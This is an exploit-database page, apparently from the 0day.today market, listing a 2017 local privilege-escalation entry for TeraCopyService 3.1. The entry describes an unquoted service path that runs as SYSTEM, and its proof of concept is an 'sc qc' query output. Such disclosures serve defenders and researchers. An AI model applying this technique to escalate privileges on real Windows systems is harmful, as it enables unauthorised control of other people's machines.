[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

TeraCopyService 3.1 Unquoted Service Path Privilege Escalation Vulnerability

Author
Rithwik Jayasimha
Risk
[
Security Risk High
]
0day-ID
0day-ID-28423
Category
local exploits
Date add
04-09-2017
Platform
windows
# Exploit Title: TeraCopyService 3.1 - Unquoted Service Path Privilege Escalation
# Date of Discovery: August 31 2017
# Exploit Author: Rithwik Jayasimha
# Author Homepage/Contact: https://thel3l.me
# Vendor Name: Codesector
# Vendor Homepage: http://www.codesector.com/
# Software Link: TOVA 8.2-202 - http://www.codesector.com/teracopy
# Affected Versions: <3.1 confirmed, possibly later versions
# Tested on: Windows 7
# Category: local
# Vulnerability type: Local Privilege Escalation


# Description:
    Teracopy installs a service ("TeraCopyService") with an unquoted service path running with SYSTEM
    privileges.
    This allows any non-privileged local user to execute arbitrary code with SYSTEM privileges.
# Proof Of Concept:
    C:\Users\potato> sc qc TeraCopyService
    [SC] QueryServiceConfig SUCCESS
    SERVICE_NAME: TeraCopyService
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 0   IGNORE
            BINARY_PATH_NAME   : C:\Program Files\TeraCopy\TeraCopyService.exe
            LOAD_ORDER_GROUP   : System Reserved
            TAG                : 0
            DISPLAY_NAME       : TeraCopy Service
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem

#  0day.today [2024-12-25]  #